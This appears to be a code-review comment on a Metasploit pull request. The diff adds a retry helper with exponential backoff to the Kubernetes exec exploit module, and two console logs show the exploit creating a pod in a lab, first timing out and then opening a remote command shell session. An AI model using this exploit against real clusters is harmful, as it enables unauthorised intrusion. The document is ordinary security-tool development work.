modules/exploits/multi/kubernetes/exec.rb

```diff
@@ -274,4 +283,32 @@ def execute_command(cmd, _opts = {})
     status = result&.dig(:error, 'status')
     fail_with(Failure::Unknown, "Status: #{status || 'Unknown'}") unless status == 'Success'
   end
+
+  # Retry until the block until it returns a truthy value. Each iteration attempt will
+  # be performed with expoential backoff. If the timeout period surpasses, false is returned.
+  def retry_until_true(timeout:)
+    start_time = Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)
+    ending_time = start_time + timeout
+    retry_count = 0
+    while Process.clock_gettime(Process::CLOCK_MONOTONIC, :second) < ending_time
+      result = yield
+      return result if result
+
+      retry_count += 1
+      remaining_time_budget = ending_time - Process.clock_gettime(Process::CLOCK_MONOTONIC, :second)
+      break if remaining_time_budget <= 0
+
+      delay = 2**retry_count
+      if delay >= remaining_time_budget
+        delay = remaining_time_budget
+        vprint_status("Final attempt. Sleeping for the remaining #{delay} seconds out of total timeout #{timeout}")
+      else
+        vprint_status("Sleeping for #{delay} seconds before attempting again")
+      end
+
+      sleep delay
+    end
+
+    false
+  end
```

Comment:
### Examples

Default 40 second timeout not getting a shell with verbose mode:
```
msf6 exploit(multi/kubernetes/exec) > rerun https://10.10.75.150:16443 httpclienttimeout=3000 verbose=true
[*] Reloading module...

[*] Using image: foo
[+] Pod created: j8cz447g
[*] Waiting for the pod to be ready...
[*] Sleeping for 2 seconds before attempting again
[*] Sleeping for 4 seconds before attempting again
[*] Sleeping for 8 seconds before attempting again
[*] Sleeping for 16 seconds before attempting again
[*] Final attempt. Sleeping for the remaining 9 seconds out of total timeout 40
[-] The pod failed to start within the expected timeframe
[-] Exploit aborted due to failure: unknown: Failed to create a new pod
[*] Exploit completed, but no session was created.
```

User configured timeout getting a shell with verbose mode:
```
rerun https://10.10.112.100:16443 httpclienttimeout=3000 verbose=true PodReadyTimeout=200
[*] Reloading module...

[*] Using image: foo
[+] Pod created: sckn7au9
[*] Waiting for the pod to be ready...
[*] Sleeping for 2 seconds before attempting again
[*] Sleeping for 4 seconds before attempting again
[*] Sleeping for 8 seconds before attempting again
[*] Sleeping for 16 seconds before attempting again
[*] Sleeping for 32 seconds before attempting again
[+] Successfully established the WebSocket
[*] Found shell.
[*] Command shell session 9 opened (10.9.6.24:39535 -> 10.10.112.100:16443 ) at 2021-11-04 22:25:27 -0400
```